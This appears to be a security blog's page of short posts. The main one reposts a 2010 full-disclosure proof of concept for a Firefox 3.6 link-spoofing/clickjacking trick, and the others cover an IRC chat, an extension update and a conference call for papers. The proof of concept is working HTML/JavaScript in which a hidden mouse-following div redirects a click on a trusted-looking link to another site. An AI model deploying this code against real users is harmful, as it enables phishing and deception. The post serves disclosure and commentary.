Xanda's Blog !~!

Phishing or Clickjacking?

Feb
26

I was about to shut down my machine and go to sleep, but suddenly my RSS reader popped up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team” remember, security through obscurity just DOESN’T WORK…
Locking down bugzilla advisories, even the 2-year-old ones, is unnecessary and lame.

<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://Maliciouswebsite';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
var mouseX=evt.pageX?evt.pageX:evt.clientX;
var mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=(mouseX-1)+'px';
document.getElementById('mydiv').style.top=(mouseY-1)+'px';
}
</script>
<br>
<a href="http://trustedwebsite" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://trustedwebsite</font></a><br>

</body>
</html>

For example:

<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.wikipedia.org';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
var mouseX=evt.pageX?evt.pageX:evt.clientX;
var mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=(mouseX-1)+'px';
document.getElementById('mydiv').style.top=(mouseY-1)+'px';
}
</script>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>

</body>
</html>

Source: www.exploit-db.com

Phishing huh? To me it's clickjacking 🙂

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Owh ya, NoScript is one of my best friends and he wants to be your best friend too 😉

Victim :: salawank

Feb
25

<xanda> salawank: my livescore2facebook is looking good.. I'll release the source code later..
<xanda> salawank: it's World Cup time.. this is bound to get a good response
<salawank> xanda: nice.. I'll check it out, especially when it reports that Chelsea lost
<salawank> hoho
<salawank> xanda: is the code in Ruby?
<xanda> salawank: originally I coded it in Ruby
<xanda> salawank: but in the end...
<salawank> php
<xanda> salawank: no.. it's Ruby.. why would I switch?
<salawank> damn
<xanda> HAHAHAHA

XandaForceHTTPS Updated

Feb
25

XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia

Read more HERE

Pen Testing the Web With Firefox

Feb
19

Nice write-up by Michael “theprez98” Schearer



Get the PDF file HERE

BruCON 2010: Call for Papers

Feb
17

Call for Papers BruCON.v2 2010: Hacking for B33r
================================================

Brussels, Belgium — This is a call for papers and participation for the second BruCON edition, a 2-day Security and Hacking Conference, full of interesting presentations, workshops and security challenges.

BruCON is an open-minded gathering of people discussing computer security, privacy, and information technology. The conference tries to create bridges between the various actors active in the computer security world, including but not limited to hackers, security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies, and so on.

The conference will be held in Brussels (24 & 25 September 2010) at The Surfhouse (www.surfhouse.be).

[READ MORE HERE]